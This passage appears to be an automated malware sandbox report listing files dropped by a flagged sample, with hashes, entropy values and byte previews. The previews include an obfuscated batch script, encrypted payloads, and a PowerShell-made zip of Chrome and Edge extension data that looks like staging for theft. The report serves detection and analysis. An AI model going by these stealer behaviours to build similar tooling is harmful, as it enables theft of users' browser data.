                                                                                            SSDEEP:768:X8XcJiMjm2ieHlPyCsSuJbn8dBhFwlSMF6Iq8KSYDKbQ22qWqO8w1R:rYMaNylPYSAb8dBnsHsPDKbQBqTY
                                                                                            MD5:0D5DF43AF2916F47D00C1573797C1A13
                                                                                            SHA1:230AB5559E806574D26B4C20847C368ED55483B0
                                                                                            SHA-256:C066AEE7AA3AA83F763EBC5541DAA266ED6C648FBFFCDE0D836A13B221BB2ADC
                                                                                            SHA-512:F96CF9E1890746B12DAF839A6D0F16F062B72C1B8A40439F96583F242980F10F867720232A6FA0F7D4D7AC0A7A6143981A5A130D6417EA98B181447134C7CFE2
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0.............^.... ........@.. ....................... .......F....`.....................................O.......8................A........................................................... ............... ..H............text...d.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................@.......H........A...p..........T................................................~P...-.r...p.....(....(....s.....P...*..0.."........(......-.r...p.rI..p(....s....z.*...0..........(....~P.....o......*..(....*n(.....(..........%...(....*~(.....(..........%...%...(....*.(.....(..........%...%...%...(....*V.(......}Q.....}R...*..{Q...*..{R...*...0...........(.......i.=...}S......i.@...}T......i.@...}U.....+m...(....o .....r]..p.o!...,..{T.......{U........o"....+(.ra..p.o!...,..{T.......
                                                                                            Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):49
                                                                                            Entropy (8bit):4.016374939798868
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:wAdks//tvBd95MAcGW2K3uc:wev/tHvcBcc
                                                                                            MD5:190C46B5065A4BDF11F434A3E8F49AE4
                                                                                            SHA1:F47DBF81648CFCDD9817F60E55326DAB0A2CB5CB
                                                                                            SHA-256:9D89630DA3BDE9505D4C2CC684EB01C2D4D7D11028D01D309ACA12B064F779E6
                                                                                            SHA-512:8F71EA206E367F2F32BF241DD8513A9F436EC4980C401527F4941048A66159B5909438381F7A36179208399FD7A0B41F208C9904E1AFD5D0DD0EF8EDB56661C6
                                                                                            Malicious:false
                                                                                            Preview:.X.%*................docsDomain."docs.google.com"
                                                                                            Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):16
                                                                                            Entropy (8bit):3.2743974703476995
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                            Malicious:false
                                                                                            Preview:MANIFEST-000001.
                                                                                            Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):367
                                                                                            Entropy (8bit):5.126252637063772
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:ku/2LN1N723iKKdK8age8Y5ouKu2KXx2KLlT/2LGWM+q2PN723iKKdK8age8Y5oc:ku/2pa5Kk8rcPXdLx/2aL+vVa5Kk8rcB
                                                                                            MD5:E2D9D758CC9BECEBD9077CF0A7AE2266
                                                                                            SHA1:FC94899556C1C7DA3503B36FCA7B987C77018E02
                                                                                            SHA-256:9E9E2E29A6809AD4EDD183D88FD11F97A22992ED46ED0727E6214DED43CBB610
                                                                                            SHA-512:4184908030351A0973E5F6CFB4917D7BDBFE15029EBA2317DBB96E4847EE7D06ACE57196B20FF4EFBD49572BEBAAF4FC29225B3E9DA62D3EA2361E5CCC003555
                                                                                            Malicious:false
                                                                                            Preview:2023/10/05-08:20:01.259 bac Creating DB C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi since it was missing..2023/10/05-08:20:01.261 bac Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi/MANIFEST-000001.
                                                                                            Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                            File Type:OpenPGP Secret Key
                                                                                            Category:dropped
                                                                                            Size (bytes):41
                                                                                            Entropy (8bit):4.704993772857998
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                            Malicious:false
                                                                                            Preview:.|.."....leveldb.BytewiseComparator......
                                                                                            Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):16
                                                                                            Entropy (8bit):3.2743974703476995
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                            MD5:46295CAC801E5D4857D09837238A6394
                                                                                            SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                            SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                            SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                            Malicious:false
                                                                                            Preview:MANIFEST-000001.
                                                                                            Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):371
                                                                                            Entropy (8bit):5.20279173554588
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:kuSM2CJ1N723oH+Tcwt8age8Y55HEZzXELIx2KLlTSM22VOq2PN723oH+Tcwt8ai:kuSMpaYeb8rcHEZrEkVLxSMnVOvVaYeq
                                                                                            MD5:3A311D9DA4F59F7D2C9172443B96A6E7
                                                                                            SHA1:40B870D1CD0BD2CADEC557658EB009DD65CBD0FC
                                                                                            SHA-256:D857A15FCFDCC08CA4B4D4BDBAFE91320F2B5B24786E9F8F7FC45E01EB4776EF
                                                                                            SHA-512:2C2F52C559586BD0120A86B9F70BA48A8B7D85888E911A8FB530DEBF7E2A0987623CC6B54A37E3C77903C087E3EEC9C4074E4D68A7FA0B6C8E9B809567A5D557
                                                                                            Malicious:false
                                                                                            Preview:2023/10/05-07:18:01.846 19a0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold since it was missing..2023/10/05-07:18:01.871 19a0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.
                                                                                            Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                            File Type:OpenPGP Secret Key
                                                                                            Category:dropped
                                                                                            Size (bytes):41
                                                                                            Entropy (8bit):4.704993772857998
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                            MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                            SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                            SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                            SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                            Malicious:false
                                                                                            Preview:.|.."....leveldb.BytewiseComparator......
                                                                                            Process:C:\Users\user\Desktop\DM6vAAgoCw.exe
                                                                                            File Type:DOS executable (COM, 0x8C-variant)
                                                                                            Category:dropped
                                                                                            Size (bytes):737280
                                                                                            Entropy (8bit):7.999727342265165
                                                                                            Encrypted:true
                                                                                            SSDEEP:12288:h5CRlmFSXGB+TSX9v2Ub8eS08hc9JDTTkL3+4Xymvs0w5uXc6RYGOTvEgdgLU:uMo4QSN+ES080H23fipuXc6VOjuLU
                                                                                            MD5:D35007CC8B2860B1FE9EE861E1F2846D
                                                                                            SHA1:58638FD185601506B3B13FE254065AEB7EDFF28C
                                                                                            SHA-256:DE1E4DBE18F0B926B49ACEB10157BC7F542409BAD6242422EFEF3B831608A037
                                                                                            SHA-512:45F851201656CB19C89274D124A7625A4C9FE12F412616A84458AA1857C61455126264416FF7FA1C9FFA99B994613BAECFACD1F8179240A5021C7E5B867EA068
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:..V.Wa.A&..~.O........*.qF..<<.O...K.....*Rh..?x...=..d..d.6w.5.*...W.....`...i...cC.............~..EnB.L.8...3.lmB.....&w.eb.....t.g3......i26../K!..t.z.:..b..t..".H.Q.9O.c.....NP.......;.G.[.....,_.&o...Mf/..#zM.].C..S.#G.?..5f......m...|Q..S\.|ks..x.....I^..ov...f..-.....)..x.|.X?..g1...r./......V.W...=q{..F.T`...&.....E..OmX.....o...0..j]M......U.........k..6.....,4p.~Z......9..c.e....S.....5...:..-.b...IWd.`....t.">.9..G'v...F....H..!........+^...G..M}.._..I...~n.tJ[.p...m...../.....x.d......w7....Z).wv..t..U..L...Bf..|..;....h]CV .......5.8b`.w.....5.S=....v....#.J*..9.!z..8O..P.....j....z.....K;....q7@LG.\.<.......x...w./T.d..!.G..\#.....`.....b....i...~3,.......L..?...VuXNR..3.[._.....(.nH.$..4.?..-...z.L3......D^R`~...{d.:.{.2c.Bj....z*.w.i.....7..V...+.g../....4...N.oe.TVb......I...x.sh....\. .....?.3X..`]G..[.fP.#;..GI.{.r.1...j..d........\^#..P.u.1....n..Q2.4!.S..........`..{D.P..6.-$..B..v).../...h.....\C...U..
                                                                                            Process:C:\Users\user\Desktop\DM6vAAgoCw.exe
                                                                                            File Type:ASCII text, with very long lines (677), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):14583
                                                                                            Entropy (8bit):5.147734083982425
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:Wz6fxVoipam62OZ6gDUrE4Tp9TQIFQFwAm:kSf3pF62OZHI44NVeFS
                                                                                            MD5:9DA23439E34B0498B82AE193C5A8F3A8
                                                                                            SHA1:AE20BBE7FAC03C94E42F4DD206D89003FAAE7899
                                                                                            SHA-256:0F241CC0324871A1A900A7AC0EDF889A8D12875B1072F44856CC979A4B7A77AC
                                                                                            SHA-512:CD4B262753B4F5F1DAC09C20FA64EBDEE00CF4A3FCE92287A7439DF943EA65BDF8569F541C2668B2164139B91FACCCFB3C98DB8AD8F686637F4E317583CC98A2
                                                                                            Malicious:false
                                                                                            Preview:Set Amount=5..QBNRoutes-Clicks-..eTHomework-Ups-Slight-Suspension-Partially-Additionally-Subsequent-..InSSurfing-Pn-Chi-Cooked-Mainstream-Collaborative-Morocco-..wPDiagnostic-Nr-Limitations-Medicine-Graphics-Tracking-Sheep-Anderson-Stakeholders-..bFXcGenerates-Joan-Menu-Literary-Wallpaper-Exam-Seasons-..HtMilitary-..SnJOutsourcing-Accessibility-Minus-Disk-Bw-Instructions-Invited-..SvqHometown-Band-Counted-Schema-Starts-Seek-Blank-Pages-..QGbSummary-Janet-Fatal-Fire-Com-..Set Tokyo=l..QpOut-Eye-Copied-Wto-Prescribed-Turbo-Narrow-..gwbOutcome-Examination-Pix-..aWCDip-Serving-..FZAcre-Satellite-Grade-..uXfDegree-Olympics-..ltCSLimited-Combo-Stanford-Disorder-Rank-Cannon-Veterans-Come-Hindu-..hrSolving-Encounter-None-Xanax-Hosts-..QeLVWaste-Joseph-Barbie-Applies-Lenses-..RqEra-Ears-Stone-..Set Degree=r..RPtAttend-Attribute-Tires-Ti-Rep-Genome-..JDpPenn-Prep-Scuba-Millennium-Probe-Herb-Underlying-..mwmdUndertake-Bosnia-Ministries-Dutch-Official-Designs-Accuracy-..HDoWebster-Atom-Rf-Topless-
                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                            File Type:ASCII text, with very long lines (677), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):14583
                                                                                            Entropy (8bit):5.147734083982425
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:Wz6fxVoipam62OZ6gDUrE4Tp9TQIFQFwAm:kSf3pF62OZHI44NVeFS
                                                                                            MD5:9DA23439E34B0498B82AE193C5A8F3A8
                                                                                            SHA1:AE20BBE7FAC03C94E42F4DD206D89003FAAE7899
                                                                                            SHA-256:0F241CC0324871A1A900A7AC0EDF889A8D12875B1072F44856CC979A4B7A77AC
                                                                                            SHA-512:CD4B262753B4F5F1DAC09C20FA64EBDEE00CF4A3FCE92287A7439DF943EA65BDF8569F541C2668B2164139B91FACCCFB3C98DB8AD8F686637F4E317583CC98A2
                                                                                            Malicious:false
                                                                                            Preview:Set Amount=5..QBNRoutes-Clicks-..eTHomework-Ups-Slight-Suspension-Partially-Additionally-Subsequent-..InSSurfing-Pn-Chi-Cooked-Mainstream-Collaborative-Morocco-..wPDiagnostic-Nr-Limitations-Medicine-Graphics-Tracking-Sheep-Anderson-Stakeholders-..bFXcGenerates-Joan-Menu-Literary-Wallpaper-Exam-Seasons-..HtMilitary-..SnJOutsourcing-Accessibility-Minus-Disk-Bw-Instructions-Invited-..SvqHometown-Band-Counted-Schema-Starts-Seek-Blank-Pages-..QGbSummary-Janet-Fatal-Fire-Com-..Set Tokyo=l..QpOut-Eye-Copied-Wto-Prescribed-Turbo-Narrow-..gwbOutcome-Examination-Pix-..aWCDip-Serving-..FZAcre-Satellite-Grade-..uXfDegree-Olympics-..ltCSLimited-Combo-Stanford-Disorder-Rank-Cannon-Veterans-Come-Hindu-..hrSolving-Encounter-None-Xanax-Hosts-..QeLVWaste-Joseph-Barbie-Applies-Lenses-..RqEra-Ears-Stone-..Set Degree=r..RPtAttend-Attribute-Tires-Ti-Rep-Genome-..JDpPenn-Prep-Scuba-Millennium-Probe-Herb-Underlying-..mwmdUndertake-Bosnia-Ministries-Dutch-Official-Designs-Accuracy-..HDoWebster-Atom-Rf-Topless-
                                                                                            Process:C:\Users\user\Desktop\DM6vAAgoCw.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):893608
                                                                                            Entropy (8bit):6.620254876639106
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:DpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31troPTdFqgaAV2M0L:DT3E53Myyzl0hMf1te7xaA8M0L
                                                                                            MD5:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                                                            SHA1:F2F57024C7CC3F9FF5F999EE20C4F5C38BFC20A2
                                                                                            SHA-256:865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
                                                                                            SHA-512:57D56DE2BB882F491E633972003D7C6562EF2758C3731B913FF4D15379ADA575062F4DE2A48CA6D6D9241852A5B8A007F52792753FD8D8FEE85B9A218714EFD0
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                                            Process:C:\Users\user\Desktop\DM6vAAgoCw.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):936960
                                                                                            Entropy (8bit):7.999787839838031
                                                                                            Encrypted:true
                                                                                            SSDEEP:24576:YUAtmMemaEnWBr7IggzgA28HTzdyF+Tudc0:0tBzWZIPgOzzoF+TAc0
                                                                                            MD5:895C5374A042A9E6C78C673690CD2275
                                                                                            SHA1:9DFE1B532F958F678DE2BAC7C74646E007A8FA14
                                                                                            SHA-256:226099AAC21E8D4A671A68B37D204339703FB696B6CC5AA30311FB55D6AB2147
                                                                                            SHA-512:130AF34BB1D12DB8E86B930D8E490754687E1381A0104AC4C98CC2F02FF7FC4ED9E1D549121A013E1C32663A00D1DC8EB20D2F9831FEB3C7EB17BF61A1D8D52C
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\DM6vAAgoCw.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):924672
                                                                                            Entropy (8bit):7.9997815054278165
                                                                                            Encrypted:true
                                                                                            SSDEEP:24576:BRDoeVqsqRauiMlgvR/scK1gE6dN3196sJVKmcp9oxSpeYCWi+INv1QH:BRDoeV7+auZwkcKuE6dN9UuSHCWi+I2
                                                                                            MD5:0E2DF9A4F4D78AD0299F0377D417B39E
                                                                                            SHA1:A2452AB3B04B480DFC2A58A416762E280254751F
                                                                                            SHA-256:8834F63F09734B9F284437F26CBA4909CE9AE1ACEAFA27E2BCD7531C1A7479DF
                                                                                            SHA-512:D8194F24CC02FC030C7CF1DAB5970257A79B8BCC887A8FF1CCD104E94EA809DCD266B056C80E6A0E73CBA71F81E654389025C939E3135F6FAFCA9D51737812B8
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\DM6vAAgoCw.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):608256
                                                                                            Entropy (8bit):7.999697266277862
                                                                                            Encrypted:true
                                                                                            SSDEEP:12288:Kjt154JaagocQMXyhq6csxBzOikOQm8uDfFQkcSUxYw16p:ut15vxocQMXyhdx5mBm8ueBBY1
                                                                                            MD5:D9182F7A263F19B9876E7E1568E6C760
                                                                                            SHA1:D0683B5A7247A2F4A69473165D2C2649F2E1C01F
                                                                                            SHA-256:4EFFF79E94F136F9BBAED62501810937785831B8C10EE9EB675CEAE24CF3C4C9
                                                                                            SHA-512:85582B94DA822580EB26BC477440D87FB0A9ED98E3B75166CD96C2A18C88367C8BDD808FC43C52C2078E625EFD81983E9F2E733272289833700649AD58A96A9B
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\DM6vAAgoCw.exe
                                                                                            File Type:PGP Secret Sub-key -
                                                                                            Category:dropped
                                                                                            Size (bytes):868352
                                                                                            Entropy (8bit):7.999826895647566
                                                                                            Encrypted:true
                                                                                            SSDEEP:24576:f68TS0M+n1WeB4MhCL3bhz0IGmcv21Z/B3U54K:f/TZMa1WCq3bBTceXBEX
                                                                                            MD5:774DF02C553D130DDE3AA7496B64EBED
                                                                                            SHA1:E2A4AAB8C3B654BD022662045FA70413A80E55F9
                                                                                            SHA-256:AE9283C1A14B751639A75592295D85105954B761737AB77FC1E667A1498F2E9E
                                                                                            SHA-512:C132CDF383E4FA32362D50768898ED9C6CD1E306056D066168A8AC1EE3EA7953424FF3B241FF1E0376B99B91F566B698BFEF07DA9BC45471097A6637DC154D11
                                                                                            Malicious:false
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                            Category:dropped
                                                                                            Size (bytes):2251
                                                                                            Entropy (8bit):5.979056697454795
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:9lOXSntwOXbYOXBOXMCw96OIOX/QUtyFyGfyX7ywKutijvG9svyWQkOXIGOX7OXH:XOXQwOXEOXBOXMCq6jOX/QYtijvZpQkI
                                                                                            MD5:F284902AA251116239327020C934B024
                                                                                            SHA1:038CEF1C5D434AAC14EE205A03D70BAB9B9ED3EE
                                                                                            SHA-256:78999281E149E0A7105092F5629003E093190EDA3F865C1AEBCA65F538559576
                                                                                            SHA-512:AD278CF627317193D1781B91BE1CFED5102AC2AA4138B1E344B357761CD54515070DD6B5B9736293AF5B78CE084D4AF1B7DBE1FFF6E7ED288D151654B377BEE4
                                                                                            Malicious:false
                                                                                            Preview:PK..........EW....*...1...2...Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\000003.log[..PU......@4#WJ~r.K~nbf..................PK..........EW.r........./...Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\CURRENT.u..ts...5..C..PK..........EW............,...Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\LOCKPK..........EW.}X.....o...+...Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\LOG.;..0.D{N...8F H.. $...q.....(6..C...n4O.'..F.../&.....r4.\..6..%....D.<6^!.K....u..V...S+f.P.e..v(tk..}w.C.....e.....+S....ou.X..uD..+o..o.@....Ce...AO.......-...n.\.......}.&..PK..........EW..P{+...)...7...Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\MANIFEST-000001.Z....#.TNjYjNJ..SeIjyfq.s~nAbQbI~...3....PK........@.EW............0...Edge\jdiccldimpdaibmpdkjnbmckianbfold\000003.logPK........@.EW.r.........-...Edge\jdiccldimpdaibmpdkjnbmckianbfold\CURRENT.u..ts...5..C..PK........@.EW............*...Edge\jdiccldimpdaibmpdkjnbmckianbfold\LOCKPK........@.EW"4v....s...)...Edge\jdiccldimpdaibmpdkjnbmckianbfold\LOG.;..0.D{N....
                                                                                            Process:C:\Users\user\Desktop\DM6vAAgoCw.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):873472
                                                                                            Entropy (8bit):7.999771421012599
                                                                                            Encrypted:true
                                                                                            SSDEEP:24576:pVSjpPwfTXXzpNAlKtl5D0M4ha4cSaeeK+1J4SZ+dC+ae:pVSjp0zpNQKtEVySaK05Z0ae
                                                                                            MD5:DE061B898E12D89C92409F220918347F
                                                                                            SHA1:6B571EDAB30DCC4D5518E5BEBB296D1F7BF5414C
                                                                                            SHA-256:70FDA66F3EA2607D6CFF63D0A6A7258577690D2A9BC5105BB529889CE025D1C2
                                                                                            SHA-512:61D94F04572643DC4274AEDDA51E7CB6BCCCEFCFA4556E6D87F94195DDF90FFBEB65909688C7BC3407F244021CC6DFF0C8692FD7835EE61E6A43A0394A693A2B
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\DM6vAAgoCw.exe
                                                                                            File Type:MPEG-4 LOAS
                                                                                            Category:dropped
                                                                                            Size (bytes):406505
                                                                                            Entropy (8bit):7.9995378716562975
                                                                                            Encrypted:true
                                                                                            SSDEEP:12288:V3Jv3CNTu77LbJT98bIqqn6mw7TzoxsGFVdiJDQLCsK:V3kNTu77xqIlgztgMMCB
                                                                                            MD5:AABC90B85B9C3B51543DE0339D29778E
                                                                                            SHA1:299F5E2CA9326E0A5FEEFB4FC7B05DA93CFD11A1
                                                                                            SHA-256:9A0A3567F4C9B9CA46FBF41D65CDD5CE464B0EFE42D6AAF7CFF840ADDBE05D60
                                                                                            SHA-512:3D951489D7D46874909BFD82E9CAC346BDD15BBB485FC76E1ED7D6FE7BB51A7649D1F649B75BB6F6F1B6F10EA16113CD01C20AA7EA85D038FCB7FE317082EDF3
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\DM6vAAgoCw.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):595968
                                                                                            Entropy (8bit):7.999664585177167
                                                                                            Encrypted:true
                                                                                            SSDEEP:12288:znvWu2yGE57zChjCiNP2kaw7L2CO43zeULJgSegv+3:zvWuWEYJCiNRaMLjOg5hk
                                                                                            MD5:B75737C804CA9949CC63BD42C945A5E6
                                                                                            SHA1:75C0490174ADC40D1824B1024021B82DD5C762B7
                                                                                            SHA-256:628068EE856D68776D6E9B755CD42D7A5A46AF1A2A6A2C22E65DB95B5D2D8F2C
                                                                                            SHA-512:58FEDD2BD6318D4B93DE429D184701E059321C16872CAFC978837C29985404BF432E4A2701894F7F67045F9684DA40C8E14F9F557DA3398C5D6EECA2E18FACA7
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\DM6vAAgoCw.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):636928
                                                                                            Entropy (8bit):7.9997148905138085
                                                                                            Encrypted:true
                                                                                            SSDEEP:12288:fytPG4+i8Y7x5DchRadzDV1Xp1vzXB8zQAOna+8:fa3T8YH4Rk1/iQAOS
                                                                                            MD5:84F05DDDEFB1C72567827BE553FE67FE
                                                                                            SHA1:C2EBCC4DE3439A8206AA8FAAC90312BFB207CE4F
                                                                                            SHA-256:B7DE8D92196F323EB9A6237B9E902461569FD093B36E1988DEE9DE2AB157BB12
                                                                                            SHA-512:99954FA07FE7CC0E54DBD0AF09B32507CD998C8B44CB63F1FFE8E30667B6D1BB0949A6C95B60E40E73F0B0BB3F11E79F8FA23F696032118210CD10F03EEC2904
                                                                                            Malicious:false
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
